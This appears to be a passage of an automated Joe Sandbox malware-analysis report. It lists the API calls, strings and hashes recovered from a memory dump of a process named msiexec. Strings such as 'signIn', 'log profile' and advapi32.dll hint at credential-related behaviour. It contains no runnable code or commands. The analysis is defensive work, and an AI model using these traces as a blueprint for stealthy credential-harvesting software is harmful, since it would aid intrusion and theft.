                                                                                                            • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Item$Dialog$MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3975816621-0
                                                                                                            • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                            • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                            • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                            • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                            APIs
                                                                                                            • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                            • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                            • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                              • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                            • String ID: .save$http://$https://$log profile$signIn
                                                                                                            • API String ID: 1214746602-2708368587
                                                                                                            • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                            • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                            • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                            • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                            APIs
                                                                                                            • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                                            • memset.MSVCRT ref: 00405E33
                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                                            • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                                            • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                            • String ID:
                                                                                                            • API String ID: 2313361498-0
                                                                                                            • Opcode ID: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                                                            • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                            • Opcode Fuzzy Hash: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                                                            • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                            APIs
                                                                                                            • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                            • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                            • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                              • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                            • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                            • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                            • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                            • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                            • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ItemMessageRectSend$Client
                                                                                                            • String ID:
                                                                                                            • API String ID: 2047574939-0
                                                                                                            • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                            • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                            • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                            • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                            APIs
                                                                                                              • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                              • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                              • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                              • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                            • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                            • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                            • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                              • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                              • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                            • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                            • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                            • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpy$memset
                                                                                                            • String ID: gj
                                                                                                            • API String ID: 438689982-4203073231
                                                                                                            • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                            • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                            • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                            • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                            APIs
                                                                                                            • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpy
                                                                                                            • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                            • API String ID: 3510742995-2446657581
                                                                                                            • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                            • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                            • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                            • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                            • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                            • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                            • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                            • memset.MSVCRT ref: 00405ABB
                                                                                                            • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                            • SetFocus.USER32(?), ref: 00405B76
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$FocusItemmemset
                                                                                                            • String ID:
                                                                                                            • API String ID: 4281309102-0
                                                                                                            • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                            • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                            • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                            • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _snwprintfwcscat
                                                                                                            • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                            • API String ID: 384018552-4153097237
                                                                                                            • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                            • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                            • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                            • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                            • String ID: 0$6
                                                                                                            • API String ID: 2029023288-3849865405
                                                                                                            • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                            • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                            • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                            • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                            APIs
                                                                                                              • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                            • memset.MSVCRT ref: 00405455
                                                                                                            • memset.MSVCRT ref: 0040546C
                                                                                                            • memset.MSVCRT ref: 00405483
                                                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$memcpy$ErrorLast
                                                                                                            • String ID: 6$\
                                                                                                            • API String ID: 404372293-1284684873
                                                                                                            • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                            • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                            • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                            • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesErrorFileLastSleep$free
                                                                                                            • String ID:
                                                                                                            • API String ID: 1470729244-0
                                                                                                            • Opcode ID: 675b33b2af9dcb3c53510e193b2b2860c3ea87b357ed647995c74d1772aabefc
                                                                                                            • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                            • Opcode Fuzzy Hash: 675b33b2af9dcb3c53510e193b2b2860c3ea87b357ed647995c74d1772aabefc
                                                                                                            • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                            APIs
                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                            • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                            • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                            • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                            • wcscat.MSVCRT ref: 0040A0E6
                                                                                                            • wcscat.MSVCRT ref: 0040A0F5
                                                                                                            • wcscpy.MSVCRT ref: 0040A107
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 1331804452-0
                                                                                                            • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                            • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                            • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                            • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                            • String ID: advapi32.dll
                                                                                                            • API String ID: 2012295524-4050573280
                                                                                                            • Opcode ID: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                            • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                            • Opcode Fuzzy Hash: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                            • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • <%s>, xrefs: 004100A6
                                                                                                            • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                            • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$_snwprintf
                                                                                                            • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                            • API String ID: 3473751417-2880344631
                                                                                                            • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                            • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                            • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                            • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wcscat$_snwprintfmemset
                                                                                                            • String ID: %2.2X
                                                                                                            • API String ID: 2521778956-791839006
                                                                                                            • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                            • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                            • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                            • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _snwprintfwcscpy
                                                                                                            • String ID: dialog_%d$general$menu_%d$strings
                                                                                                            • API String ID: 999028693-502967061
                                                                                                            • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                            • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                            • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                            • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                            APIs
                                                                                                            • strlen.MSVCRT ref: 00408DFA
                                                                                                              • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                            • memset.MSVCRT ref: 00408E46
                                                                                                            • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                            • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                            • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                            • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                            • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                            • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpy$memsetstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2350177629-0
                                                                                                            • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                            • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                            • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                            • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset
                                                                                                            • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                            • API String ID: 2221118986-1606337402
                                                                                                            • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                            • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                            • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                            • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                            APIs
                                                                                                            • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                            • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                                            • memset.MSVCRT ref: 00408FD4
                                                                                                            • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                                            • memset.MSVCRT ref: 00409042
                                                                                                            • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                              • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 265355444-0
                                                                                                            • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                            • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                            • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                            • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 004116FF
                                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                              • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                            • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                            • API String ID: 2618321458-3614832568
                                                                                                            • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                            • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                            • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                            • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesFilefreememset
                                                                                                            • String ID:
                                                                                                            • API String ID: 2507021081-0
                                                                                                            • Opcode ID: ea0ff07029848add1e185646dd88dbb6c2c853951c2e6fbb7239dcf5113ebac3
